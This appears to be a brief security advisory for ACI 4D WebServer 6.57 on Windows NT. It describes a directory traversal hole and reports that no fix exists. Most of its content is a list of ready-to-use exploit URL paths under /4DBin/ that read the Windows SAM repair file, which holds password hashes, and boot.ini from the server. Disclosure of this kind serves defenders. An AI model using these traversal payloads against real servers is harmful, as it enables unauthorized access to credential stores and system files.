|
COMMAND ACI 4D WebServer SYSTEMS AFFECTED ACI 4D WebServer 6.57 (at least) PROBLEM 'KF' found following. This directory transversal hole seems to work on ACI 4d webserver running on the NT platform. One would imagine exploitation on a macos box would be similar but would require the proper mac filesystem path to the file you wish to view. Exploit: http://host + one of the following urls. - /4DBin/_/C:/winnt/repair/sam._ - /4DBin/_/../winnt/repair/sam._ - /4DBin/_/C:/inetpub/../boot.ini - /4DBin/_/../boot.ini - /4DBin/_/../inetpub/../boot.ini SOLUTION Nothing yet.